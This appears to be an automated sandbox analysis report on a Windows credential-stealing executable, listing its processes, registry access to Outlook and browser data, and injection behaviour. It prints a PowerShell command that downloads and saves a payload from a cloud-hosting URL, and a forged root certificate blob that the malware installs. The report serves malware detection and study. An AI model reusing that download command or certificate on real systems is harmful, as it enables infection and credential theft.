Malware Analysis Report

2024-12-01 03:03

Sample ID 241108-el2wwsxngq
Target e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags
execution collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe was found to be: Known bad.

Malicious Activity Summary

execution collection discovery spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Drops startup file

Loads dropped DLL

Reads WinSCP keys stored on the system

Executes dropped EXE

Reads user/profile data of web browsers

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Checks installed software on the system

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_office_path

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies system certificate store

Modifies registry class

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 04:02

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 04:02

Reported

2024-11-08 04:05

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files

memory/2512-4-0x000007FEF61CE000-0x000007FEF61CF000-memory.dmp

memory/2512-7-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2512-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2512-8-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-9-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-10-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-11-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-12-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 04:02

Reported

2024-11-08 04:05

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

137s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 3232 created 3472 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3232 set thread context of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2928 set thread context of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4372 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4784 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4876 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 984 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 1860 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 2060 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 3544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4644 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\jsc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C6F1081809409790478F3A37BAEEC7537DABDF31 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C6F1081809409790478F3A37BAEEC7537DABDF31\Blob = 030000000100000014000000c6f1081809409790478f3a37baeec7537dabdf312000000001000000340200003082023030820199a003020102020853599fb871144220300d06092a864886f70d01010b050030503132303006035504030c294d6963726f666f66742041757468656e7469636f646528746d2920526f6f7420417574686f72697479310d300b060355040a0c044d534654310b3009060355040613025553301e170d3232313130393034303334305a170d3236313130383034303334305a30503132303006035504030c294d6963726f666f66742041757468656e7469636f646528746d2920526f6f7420417574686f72697479310d300b060355040a0c044d534654310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100d7e0395eb912cd21b2edc3f5069e272341ebd90e800d8d6d70c1558a9c1682b2cf7204aa9a53edb3585babca7ef00f12f601025fe6cf78a0bc3d9500f3d08847f7fefebcfa7d5aeede168aa9b5cc84e5cf618f07dd941d07d96bb251b0cf133a076c2d2134575a242f23a4878cdb77ffad1aae7ae53063e562245fcfd5a7dd490203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038181002732d1ac1ea2d7875e4117d67f098221273f14d09d7aa9c676495649478e468f819e851d7d90668c54272ab110f961d1382967c809cb88d29ee9a467e1dd1ebb3cf2af3d22ed0a57043430c7d09ea4472931d9a8121ba6364d8791a832313049728ac0ba7666364a3af78286708e236584c6343677d183f9a278772e746efc20 C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2428 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
